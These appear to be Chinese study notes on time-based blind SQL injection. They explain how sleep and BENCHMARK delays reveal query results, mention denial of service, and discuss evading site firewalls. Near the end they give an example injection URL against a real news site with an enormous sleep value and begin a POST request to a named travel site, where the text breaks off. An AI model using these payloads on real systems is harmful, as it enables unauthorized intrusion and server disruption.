A: 时间差注入也叫延迟注入,是一种盲注的手法 提交对执行时间铭感的函数sql语句,通过执行时间的长短来判断是否执行成功,比如:正确的话会导致时间很长,错误的话会导致执行时间很短,这就是所谓的高级盲注。
利用BENCHMARK sleep 函数来注入
利用sleep也可以引起拒绝服务
B:
有时候当我们注入某站时,某站突然就打不开了,
被防火墙暂时隔离,你没法浏览他的页面,这时候你不得不换换IP,或者等待恢复,
或者提交注入参数的时候,网站的某种保护措施,他会跳转某个错误页面,访问N次错误页面的时候,才会正常访问。
这样就会影响咱们的效率,这就是为什么延时注入也算一节课的原因,还是蛮重要的.
C:
途牛主站延时注入+waf绕过
http://www.2cto.com/Article/201502/377118.html
eg.1http://wap.people.com.cn/newsView.php?sid=&cnid=1456639 and sleep(99999999999)&chid=1_14_3&coid=1_14_3_1&wv=2&v=l&return=c
eg.2
POST /main.php?do=online_book_do_visitor HTTP/1.1
Host: km.tuniu.com
User-Agent: Mozilla/5.0 (iPhone; U; CPU iPhone OS 3_0 like Mac OS X; en-us) AppleWebKit/528.1